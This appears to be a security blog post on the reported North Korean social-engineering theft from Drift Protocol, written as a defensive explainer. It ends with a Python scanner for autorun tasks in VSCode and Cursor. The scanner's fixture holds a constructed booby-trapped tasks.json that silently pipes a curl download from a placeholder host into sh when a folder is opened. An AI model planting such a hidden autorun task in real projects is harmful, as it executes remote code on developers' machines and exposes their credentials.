
North Korea Stole $285M From a DeFi Protocol. The Attack Started With a Handshake.

Drift Protocol lost $285 million to a North Korean state group that spent six months building trust in person. Here is how the operation worked and what it means for every company that takes meetings with external partners.


Drift Protocol, one of the largest decentralized exchanges on Solana, published their incident report this week. On April 1, 2026, approximately $285 million was drained from the protocol. The attack was not a smart contract exploit. It was the result of a six-month social engineering operation attributed with medium-high confidence to UNC4736, a North Korean state-affiliated threat group.

This is the same group behind the $50 million Radiant Capital hack in October 2024. The attribution is supported by onchain fund flows and operational pattern overlaps confirmed by the SEAL 911 team, TRM Labs, and Elliptic. Mandiant has been engaged for device forensics.

What makes this incident worth studying is not the dollar amount. It is the operational tradecraft.

How the operation worked

In Fall 2025, a group of individuals approached Drift contributors at a major cryptocurrency conference. They presented themselves as a quantitative trading firm looking to integrate with the protocol. They were technically fluent, familiar with how Drift operated, and had professional backgrounds that checked out when examined.

A Telegram group was established after the first meeting. Over the following months, the group engaged Drift contributors in substantive conversations about trading strategies, vault integrations, and product details. These interactions were indistinguishable from how legitimate trading firms typically onboard with DeFi protocols.

Between December 2025 and January 2026, they onboarded an Ecosystem Vault on Drift. They deposited over $1 million of their own capital. They participated in multiple working sessions and asked detailed, informed product questions.

Throughout February and March 2026, various Drift contributors met individuals from this group again, face-to-face, at multiple major industry conferences in multiple countries. By this point, the relationship was nearly half a year old.

The attack vectors

Drift's forensic review identified three potential intrusion vectors:

  1. Malicious code repository. One contributor cloned a code repository shared by the group under the guise of deploying a frontend for their vault. The repo likely carried the VSCode/Cursor autorun issue described below: opening the folder in the editor was enough to execute code silently, with no prompt or warning.

  2. Fake TestFlight application. A second contributor was induced to install a TestFlight build that the group presented as their wallet product.

  3. IDE vulnerability exploitation. The VSCode/Cursor autorun issue was actively flagged by the security community from December 2025 through February 2026, so it was public knowledge, not a zero-day. Opening a repository in the editor was sufficient to execute code silently, with no permissions dialog or indication of any kind; this is the likely execution path for vector 1.

When the exploit executed on April 1, the attackers simultaneously scrubbed their Telegram chat histories and wiped the malicious software from the compromised devices, destroying evidence on the relationship side and the device side at the same moment.

The attribution

The SEAL 911 team assessed with medium-high confidence that the operation was carried out by the same threat actors responsible for the October 2024 Radiant Capital hack. Mandiant tracks this group as UNC4736, also known as AppleJeus or Citrine Sleet. The connection rests on two things: the onchain funds used to stage and test the Drift operation trace back to the Radiant attackers, and the operational patterns overlap with known DPRK-linked activity.

The individuals who appeared in person were not North Korean nationals. DPRK threat actors operating at this level deploy third-party intermediaries to conduct face-to-face relationship-building. The profiles used in this operation had fully constructed identities including employment histories, public-facing credentials, and professional networks that could withstand scrutiny during a business relationship.

Why this matters beyond crypto

It is tempting to file this under "crypto problems." That would be a mistake.

The tradecraft used here is not specific to DeFi: state-level actors building fabricated identities, attending industry conferences, establishing real business relationships, and then compromising devices through shared code repositories or demo applications. Every one of those steps maps directly onto how B2B SaaS companies evaluate and onboard partners, vendors, and integrators.

Consider what this operation required:

  • Six months of sustained engagement with a target organization

  • Over $1 million in capital deployed to establish credibility

  • Multiple in-person meetings across countries with non-attributed intermediaries

  • Fabricated professional identities that survived months of due diligence

  • Weaponization of standard developer tools (code repos, IDE vulnerabilities, TestFlight)

Most organizations are not prepared for this level of patience and resource commitment from an attacker. Security awareness training covers phishing emails and suspicious links. It does not cover a counterparty who has been attending your industry events, contributing real capital, and building genuine-looking operational history for half a year.

The IDE blind spot

The VSCode/Cursor issue deserves special attention. Oasis Security disclosed it in September 2025. The underlying mechanism is a documented editor feature, not a memory bug: a task in .vscode/tasks.json with "runOn": "folderOpen" starts as soon as the folder is opened. VS Code gates that behind Workspace Trust, which asks before treating an unfamiliar folder as trusted. Cursor shipped with Workspace Trust disabled by default, so a project can include a hidden autorun task that executes the moment you open the folder. No prompt. No consent.

Developer laptops typically have access to cloud keys, personal access tokens, API credentials, and SaaS sessions. A booby-trapped repository can pivot from one machine to CI/CD pipelines and cloud infrastructure in minutes.

If your engineering team regularly clones repositories from external collaborators, partners, or open-source projects, this attack vector applies to you. It does not require the victim to knowingly run anything. Opening the folder is enough.

What to do about it

Drift's post-mortem includes a clear recommendation: check in on your teams, audit who has access to what, and treat every device that touches your signing infrastructure as a potential target. Here is a more specific list for B2B SaaS teams:

  • Enable Workspace Trust in VSCode and Cursor (security.workspace.trust.enabled), and set task.allowAutomaticTasks to off so folderOpen tasks never start even in a folder someone has already trusted. Workspace Trust is a user-level setting that a repository cannot override, which is exactly why both should be enforced across your engineering org through managed device configuration, not left as an individual setting.

  • Audit external code before opening it. Before a shared repository ever goes into an editor, inspect it with plain tools (cat, grep) or in a throwaway VM: look for .vscode/tasks.json files, including in nested folders, and for .code-workspace files, and flag any task with runOn: folderOpen. Treat shared repos from partners with the same suspicion as random open-source dependencies.

  • Segment devices that have privileged access. Laptops that touch production signing keys, admin consoles, or multisig infrastructure should not be the same machines used for general development, conference demos, or partner collaboration.

  • Require secondary approval for high-impact actions. Any action that can move significant funds, modify access controls, or alter production infrastructure should require approval from a second party on a separate device.

  • Treat partner onboarding as a security process, not just a business one. Verifiable LinkedIn profiles and conference appearances are not identity verification. If a partner relationship involves sharing code, granting system access, or integrating infrastructure, apply the same rigor you would to a vendor security review.
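The autorun mechanism described in the IDE blind spot section and the first two recommendations above come together in the following scanner. It is an added illustration, not Drift's post-mortem tooling or anything from Oasis Security: it builds a constructed sample clone containing a booby-trapped .vscode/tasks.json (the curl command is a harmless placeholder, not the payload from the incident), walks the tree for tasks that would start on folder open, and checks a user-settings dictionary for the two keys that stop them. The repo name, file layout and task labels are made up; task.allowAutomaticTasks is a VS Code setting and is assumed here to carry over to Cursor as a VS Code fork.

```python
"""Scan a cloned repository for VS Code / Cursor tasks that run on folder open,
and check the user-level settings that are supposed to stop them.
Added illustration, not Drift's or Oasis Security's tooling."""
import re
import json
import tempfile
from pathlib import Path

# Constructed booby-trapped tasks.json. The task starts the moment the folder
# is opened ("runOn": "folderOpen") and hides its terminal ("reveal": "silent").
# The command is a harmless placeholder, not the payload from the incident.
MALICIOUS_TASKS_JSON = r'''{
  // Looks like ordinary frontend tooling
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install deps",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",  // placeholder
      "presentation": { "reveal": "silent" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ],
}'''
BENIGN_TASKS_JSON = '{"version": "2.0.0", "tasks": [{"label": "build", "type": "shell", "command": "npm run build"}]}'

# Hardened user-level settings. Workspace Trust is application-scoped, so a
# repo's .vscode/settings.json cannot override it; task.allowAutomaticTasks is
# a VS Code setting, assumed here to apply to Cursor as a VS Code fork.
HARDENED_USER_SETTINGS = {
    "security.workspace.trust.enabled": True,  # prompt before trusting a new folder
    "task.allowAutomaticTasks": "off",        # never start folderOpen tasks at all
}


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas.
    VS Code tolerates both in tasks.json; json.loads does not."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, including \"
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):       # skip to (not past) the newline
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    # Regex trailing-comma cleanup can touch string contents; fine for a scanner.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def tasks_in(path: Path) -> list:
    """Task list from a tasks.json or a .code-workspace (embedded "tasks" section)."""
    doc = json.loads(strip_jsonc(path.read_text(encoding="utf-8")))
    section = doc if path.name == "tasks.json" else doc.get("tasks", {})
    return section.get("tasks", []) if isinstance(section, dict) else []


def find_autorun_tasks(repo: Path) -> list:
    """Walk a clone (nested .vscode folders included, since subfolders get opened
    as workspaces too) and report every task that would start on folder open.
    Files that do not parse are reported rather than silently skipped."""
    findings = []
    candidates = sorted(
        p for p in repo.rglob("*")
        if (p.name == "tasks.json" and p.parent.name == ".vscode") or p.suffix == ".code-workspace"
    )
    for path in candidates:
        rel = path.relative_to(repo).as_posix()
        try:
            tasks = tasks_in(path)
        except (ValueError, UnicodeDecodeError):
            findings.append({"file": rel, "label": "<unparseable>", "command": ""})
            continue
        for task in tasks:
            if isinstance(task, dict) and (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append({"file": rel, "label": task.get("label", "<unlabelled>"),
                                 "command": task.get("command") or task.get("script") or ""})
    return findings


def settings_gaps(settings: dict) -> list:
    """Report user settings that still leave folderOpen autorun possible."""
    gaps = []
    if settings.get("security.workspace.trust.enabled") is not True:
        gaps.append("security.workspace.trust.enabled is not true (Cursor ships it off)")
    if settings.get("task.allowAutomaticTasks") != "off":
        gaps.append("task.allowAutomaticTasks is not 'off', so trusted folders still autorun")
    return gaps


def demo() -> list:
    """Build the constructed sample clone in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp) / "partner-vault-frontend"          # constructed name
        (repo / ".vscode").mkdir(parents=True)
        (repo / ".vscode" / "tasks.json").write_text(MALICIOUS_TASKS_JSON)
        nested = repo / "packages" / "ui" / ".vscode"          # benign nested config
        nested.mkdir(parents=True)
        (nested / "tasks.json").write_text(BENIGN_TASKS_JSON)
        return find_autorun_tasks(repo)


if __name__ == "__main__":
    for f in demo():
        print(f"AUTORUN {f['file']}: {f['label']!r} -> {f['command']!r}")
    for gap in settings_gaps({"security.workspace.trust.enabled": False}):
        print("SETTINGS", gap)
```

Run it from a terminal, not from inside the editor you are trying to protect: the whole point is that the folder is inspected before any IDE sees it. The comment stripper matters because a plain grep for folderOpen is easy to evade with a commented-out decoy; the parser reports what the editor would actually load.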

The bottom line

The Drift exploit is a case study in what happens when a well-resourced adversary decides that the cheapest way into your systems is through your relationships. The attackers did not need a zero-day in Drift's code. They needed a handshake, six months of patience, and a repository that opened in the wrong IDE.

"We know who we're working with" is not a security control. It is an assumption. And assumptions are what state-level threat actors are trained to exploit.